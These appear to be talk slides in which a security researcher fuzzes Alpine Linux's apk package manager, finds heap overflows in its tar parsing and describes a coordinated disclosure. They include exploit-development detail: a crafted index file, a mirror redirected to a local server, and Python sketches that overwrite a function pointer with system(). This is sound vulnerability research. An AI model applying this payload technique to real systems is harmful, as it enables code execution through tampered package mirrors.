Exploiting Alpine Linux From Vulnerability to Code Execution

Exploiting Alpine Linux: from vulnerability discovery to code execution
By Ariel Zelivansky, Security Researcher

What is Alpine Linux?
• Lightweight Linux distribution
• Alpine’s motto: Small, simple and secure
• The Alpine Docker image is only 5 MB in size
• Security in mind
  ◦ The kernel is patched with a port of grsecurity/PaX
  ◦ Userspace binaries compiled as PIE, NX enabled, full RELRO, with stack smashing protection

Who uses Alpine?
• Alpine has become widely popular for use with containers (10M+ pulls)
• Many Docker images are now based on Alpine
• Docker has officially stated its support of Alpine

Researching Alpine
• What does an Alpine container consist of?
  ◦ musl libc
  ◦ busybox userspace binaries
  ◦ apk-tools
• What do people do with Alpine containers?
  ◦ Download more programs!
  ◦ apk - Alpine’s package manager

Apk
• A tool to install, upgrade and delete packages (aka a package manager)
• Historically a collection of shell scripts, now written in C
• To add a package - apk update and apk add [name]
  ◦ Or just apk add [name] -U/--update
• Can I somehow alter packages or convince apk to downgrade packages?

Apk
• Documentation first (Alpine’s wiki)
  ◦ /etc/apk/repositories - list of local/remote repositories
  ◦ By default with the Docker image - plain http
• Prone to MITM attack
• Fortunately, an attack is not so simple
  ◦ Packages are signed
  ◦ See /etc/apk/keys
• What about update?
  ◦ “A repository is simply a directory with a collection of *.apk files. The directory must include a special index file, named APKINDEX.tar.gz to be considered a repository.”
  ◦ Update essentially downloads and parses the APKINDEX.tar.gz file
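As a rough illustration of what apk update has to download and parse, the sketch below builds a stand-in APKINDEX.tar.gz in memory and lists its members. The member names (a `.SIGN.RSA.*` signature file, `DESCRIPTION`, `APKINDEX`) and all contents are assumptions for illustration; they are not taken from the slides.

```python
import io
import tarfile


def build_index(members):
    """Return the bytes of a gzip-compressed tar holding name -> data members."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def list_members(archive):
    """List member names in the order they appear in the archive."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        return [member.name for member in tar.getmembers()]


# Hypothetical member names and contents, for illustration only.
index = build_index({
    ".SIGN.RSA.example.rsa.pub": b"<signature bytes>",
    "DESCRIPTION": b"example",
    "APKINDEX": b"P:example\nV:1.0-r0\n\n",
})
names = list_members(index)
print(names)
```

The point of the sketch is that the signature travels inside the same archive, so the tar parser has to run on untrusted bytes before anything can be verified.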

Apk
• Signature inside archive?
• Sounds like fuzzing time
  ◦ What’s fuzzing?
  ◦ american fuzzy lop (afl-fuzz)
    ▪ Finds lots of bugs (and vulnerabilities) in open source software projects
    ▪ Compile with afl-gcc to instrument the target

Apk
• Clone apk-tools from Alpine’s git repository
• Empty README
• Relevant code seems likely to be in update.c
• main is in apk.c
• After inspecting the code for a while, it appears each action is defined as an applet

Apk
• update.c doesn’t seem to do anything
  ◦ Actual code in database.c looks for the APK_UPDATE_CACHE flag
  ◦ After briefly learning the code, I was ready to fuzz it
• Writing my own applet
  ◦ Read data from file (fuzzer will provide)
  ◦ Call apk_bstream_from_file to read the file
  ◦ Call apk_db_index_read with the data
  ◦ Define applet, add to Makefile
• Running afl inside a Docker container
  ◦ Easy to set up and reproduce

Fuzzing Apk
• Fuzzer does nothing
• Tried fuzzing various other functions, tweaked the code to allow fuzzing
• Finally, decided on fuzzing apk_tar_parse
  ◦ Looks promising

Fuzzing Apk
• Fuzzing was very slow in my experience
• Diving into the code again
  ◦ Removed anything I don’t need that might slow down the fuzzer
  ◦ init_openssl
  ◦ apk_db_init / apk_db_open
• Fuzz time

Fuzzing Apk
• Multiple crashes
• Triaging crashes with crashwalk
  ◦ Runs through all crashes and identifies the crash type
  ◦ Suggests whether each crash is exploitable
  ◦ My final summary shows 6 different crashes

Reproducing the crash
• So far I was only able to reach the crashes in my modified code
• To reproduce with the real apk, I used a crash as a bad tar.gz file
  ◦ cat crash | gzip -9 > ~/docker/files/alpine/v3.6/main/x86_64/APKINDEX.tar.gz
  ◦ Served the file from my local server
  ◦ docker run -ti --add-host dl-cdn.alpinelinux.org:172.17.0.2 alpine:3.6
  ◦ Upon running apk update, a segfault occurred!
• After a debugging session with gdb, I determined the origin of the crash
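The gzip step above can also be scripted. This is a minimal sketch that mirrors the `cat crash | gzip -9 > …` command; the function name `publish_index`, its parameters and the sample bytes are hypothetical, and only the directory layout follows the path shown on the slide.

```python
import gzip
import tempfile
from pathlib import Path


def publish_index(crash_bytes, repo_root, branch="v3.6", repo="main", arch="x86_64"):
    """Write crash_bytes, gzip-compressed, where a mirror would keep its index."""
    target = Path(repo_root) / "alpine" / branch / repo / arch / "APKINDEX.tar.gz"
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_bytes(gzip.compress(crash_bytes, compresslevel=9))
    return target


# Demo in a throwaway directory with placeholder input.
with tempfile.TemporaryDirectory() as root:
    path = publish_index(b"example crash input", root)
    round_trip = gzip.decompress(path.read_bytes())
    relative = path.relative_to(root).as_posix()

print(relative)
```

Any static file server pointed at the root directory would then serve the file at the URL path apk requests.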

Explaining the bugs
• The result is two (similar) heap overflow vulnerabilities
• Let’s examine the relevant code (inside archive.c)
• Tar consists of blocks of 512 bytes, starting with a tar header block for each file
  ◦ apk reads the tar stream in chunks and runs a callback function on each chunk
• One of the fields of the header is a typeflag
  ◦ One of its uses is to indicate special blocks, such as the “GNU long name extension”
  ◦ This extension indicates that the following block holds the name of the file (the header’s own name field is limited to 100 bytes)
• How is this implemented?
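To make the header layout concrete, here is a small sketch that lets Python’s tarfile module write a GNU-format archive for an over-long name, then decodes the first 512-byte header by hand. The field offsets (name at 0, size at 124, typeflag at 156) are the standard ustar ones; the file name is made up.

```python
import io
import tarfile

BLOCK = 512


def first_header(name):
    """Create a GNU-format tar with one empty file and return its first block."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.GNU_FORMAT) as tar:
        info = tarfile.TarInfo(name)
        info.size = 0
        tar.addfile(info)
    return buf.getvalue()[:BLOCK]


def parse_header(block):
    """Decode the three header fields discussed on the slide."""
    return {
        "name": block[0:100].rstrip(b"\0").decode(),
        "size": int(block[124:136].rstrip(b"\0 ").decode(), 8),  # ASCII octal
        "typeflag": block[156:157].decode(),
    }


long_name = "d/" * 60 + "file.txt"  # 128 characters, over the 100-byte field
header = parse_header(first_header(long_name))
print(header)
```

The first header is the special long-name block: its typeflag is `L` and its size field gives the length of the name data that follows, including the terminating NUL.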

Explaining the bugs
• Uses blob_realloc to allocate the buffer for the name

Explaining the bugs
• int is naturally signed
  ◦ b->len is long, also signed
  ◦ The comparison is signed
• Any size of 0x80000000 or above (past the signed 32-bit maximum of 0x7fffffff) is treated as negative, which leaves the buffer unmodified
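The signed comparison can be modelled in a few lines. This sketch assumes the early-return check has the shape "skip reallocation when the current length is already >= the requested size, with the request taken as a 32-bit int"; that shape and the helper names are assumptions, since the code on the slide is not reproduced in this transcript.

```python
INT_BITS = 32


def as_signed_int(value):
    """Interpret the low 32 bits of value as a two's-complement C int."""
    value &= (1 << INT_BITS) - 1
    return value - (1 << INT_BITS) if value >> (INT_BITS - 1) else value


def would_grow(current_len, requested):
    """Assumed check: the buffer grows only if current_len < (int)requested."""
    return current_len < as_signed_int(requested)


for requested in (0x200, 0x7FFFFFFF, 0x80000000, 0xFFFFFFFF):
    print(hex(requested), as_signed_int(requested), would_grow(0x100, requested))
```

Requests up to 0x7fffffff grow the buffer as intended, while anything from 0x80000000 upward compares as negative and the buffer keeps its old size.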

Explaining the bugs
• In the following call to is->read, a huge number of bytes will be copied to the buffer
  ◦ AKA heap overflow
  ◦ As long as is->read accepts the size as unsigned
  ◦ In the case of a tar.gz, is->read is gzi_read, which accepts size_t (unsigned)

Explaining the bugs
• So to fix, make blob_realloc accept size_t!
  ◦ Yes, but also make sure entry.size is not max int (because a +1 would overflow it)
• A similar bug occurred with a pax header block (another special block)

Developing an exploit
• I built a minimalistic tar file
  ◦ To trigger the bug, I put a longname block with a negative size
  ◦ In tar, size is an octal number in ASCII; I went with 0o77777777777 (-1 when truncated to a signed 32-bit integer)

Developing an exploit
• The execution crashed as expected
  ◦ The crash was on the copy of a null-terminating zero meant for the entry.name buffer
  ◦ entry.name was not allocated, so it pointed to null
  ◦ entry.size was 0xffffffffffffffff (it is of type off_t, so it was implicitly converted to 64-bit)
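The size arithmetic on the last two slides can be checked directly. The sketch below parses the octal field, truncates it to a signed 32-bit value, then sign-extends it to 64 bits. The helper name is hypothetical, and the exact sequence of conversions inside apk is an assumption.

```python
def truncate_to_int32(value):
    """Keep the low 32 bits and read them as a signed two's-complement int."""
    value &= 0xFFFFFFFF
    return value - (1 << 32) if value & 0x80000000 else value


size_field = "77777777777"               # 11 octal digits, as stored in the header
parsed = int(size_field, 8)              # value of the ASCII octal string
as_int = truncate_to_int32(parsed)       # what a 32-bit signed int would hold
as_off_t_bits = as_int & (2 ** 64 - 1)   # bit pattern after widening to 64 bits

print(hex(parsed), as_int, hex(as_off_t_bits))
```

Eleven octal sevens are 33 one-bits, so the 32-bit value is all ones, which reads as -1 and sign-extends to the 0xffffffffffffffff seen in the debugger.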

Developing an exploit
• I created another file, with two blocks
  ◦ First block allocates the buffer with a size I want
  ◦ Second block exploits the vulnerability with the allocated buffer
• Debugging the execution, it seems everything goes as expected
  ◦ The buffer is allocated then overwritten
  ◦ The code works to my advantage - is->read is gzi_read
    ▪ gzi_read copies chunks from the source stream to the target and stops once the source runs out!
    ▪ No need to worry about the source’s size

Developing an exploit
• There are various known ways to exploit a heap overflow
  ◦ Remember musl libc? Memory allocation (malloc, realloc) is done by it
  ◦ I preferred not to research it
  ◦ I can work around that by building the exploit on apk’s own code
    ▪ Is there anything useful on the heap? A flag to change? Structs with callbacks?
    ▪ I could simply change a callback address to execv or system
• Mitigations?
  ◦ ASLR
  ◦ For the sake of a proof-of-concept, ignoring ASLR

Developing an exploit
• Lots of trial and error, trying to find structs after entry.name that I should overwrite
• I realized I can just use the is struct, which is used on is->read
• It is of type apk_istream
• I put a breakpoint on the call to is->read
• I calculated the delta between my buffer (entry.name) and the is struct

Developing an exploit
• I filled my tar file with 0x153a0 bytes, followed by 16 zero bytes
• It worked!
  ◦ The execution crashed on 0x0000000000000000
• Next step - call system with a string I control
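The data written past the buffer on this slide has a simple shape: filler up to the struct, then two 8-byte values. A sketch follows, assuming the two values land on the first two pointers of the struct (get_meta, then read); the function name and the filler byte are arbitrary.

```python
import struct

NAME_TO_IS_DELTA = 0x153A0  # distance from entry.name to the is struct (from the slide)


def build_overwrite(delta, get_meta=0, read=0):
    """Filler up to the struct, then two little-endian 64-bit pointer values."""
    filler = b"A" * delta
    return filler + struct.pack("<QQ", get_meta, read)


payload = build_overwrite(NAME_TO_IS_DELTA)
print(len(payload), payload[-16:])
```

With both values left at zero, the next call through the overwritten pointer jumps to address 0, which matches the crash described above.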

Developing an exploit
• is->read parameters?
  ◦ is->read(is, entry.name, entry.size);
• Since the first parameter is the struct itself, I could overwrite its first 8 bytes with my shell string
  ◦ The first 8 bytes hold get_meta, which is not called in our context
  ◦ I used “echo 1” as the string
  ◦ It worked!
• New problems
  ◦ Shell string limit is 8 bytes, too short
  ◦ The next day I failed to reproduce the exploit
    ▪ is->read seems to write the data in chunks, so it only writes 4 bytes and calls is->read again (which is only partly modified)

Developing an exploit
• How would I find what’s after the is struct?
• I restored the is struct in the file (copying the actual addresses)
• I added random bytes after it
• The gis->bs pointer seems like a good choice
• It is of type apk_bstream

Developing an exploit
• gis->bs->read is used in the same manner as is->read
• It has 8 more bytes to use for the shell string (used for flags)
• I overwrote a pointer to the struct, unlike is where I had overwritten the actual struct
• I put my data just 32 bytes before the is struct
  ◦ I could put it anywhere I have control of
• Memory layout: gis->bs->flags, gis->bs->get_meta, gis->bs->read (overwritten to system), gis->bs->close, is->get_meta…
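The 32-byte fake struct described above can be sketched as follows. The field order (flags, get_meta, read, close) follows the layout listed on the slide; the address is a placeholder rather than a real location of system, and the command string is an arbitrary example.

```python
import struct

SYSTEM_ADDR = 0x4141414141414141  # placeholder, not a real address


def fake_bstream(command, system_addr, close_addr=0):
    """Pack a command over flags + get_meta (16 bytes), then read and close."""
    raw = command.encode() + b"\0"
    if len(raw) > 16:
        raise ValueError("command plus NUL must fit in 16 bytes")
    return raw.ljust(16, b"\0") + struct.pack("<QQ", system_addr, close_addr)


fake = fake_bstream("echo hello", SYSTEM_ADDR)
print(len(fake), fake)
```

Because the struct pointer is passed as the first argument to read, the start of the struct doubles as the command string, which is why the extra 8 bytes of the flags field matter.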

Developing an exploit
• It works!

Real attack vector
• Man-in-the-middle in an organization
  ◦ Attacker gets code execution on any Alpine package install or update
  ◦ Attacker gets code execution on building Alpine images
  ◦ The signature did not help since it’s taken from inside the tar

Final steps
• I’ve found a vulnerability, what next?
• Responsible/Coordinated disclosure
  ◦ Estimate the impact, write a proof-of-concept if it makes sense
  ◦ Contact the developers
    ▪ Nearly always privately, you don’t want public disclosure
    ▪ Work on a fix
  ◦ Assign CVE IDs
    ▪ Check for the correct CNA (CVE Numbering Authority)
    ▪ Otherwise contact MITRE through their web form
  ◦ Disclose the vulnerability online
    ▪ For open source the oss-security mailing list is a good choice

Final steps
• The bugs I found affect all apk versions since 2.5.0_rc1
• I reached Alpine’s developers on IRC
  ◦ Discussed the issues with Timo Teräs in private emails
  ◦ A patch was released very quickly and was pushed to apk-tools 2.7.2 and 2.6.9
    ▪ All Alpine versions from current to 3.2-stable include the fix
  ◦ Besides fixing the bugs, Timo also implemented additional hardening to keep attackers from creating a similar exploit
    ▪ This is done by removing the use of function pointers that are saved on structs on the heap
• I sent an advisory to oss-sec and wrote about the issue on the Twistlock blog

Future ideas
• Fuzzing other parts of apk
• Fuzzing other Alpine tools
• Fuzzing libfetch

Demonstration

Ariel Zelivansky [email protected] @TwistlockLabs (new!) Blog: Twistlock.com/blog Thank you!
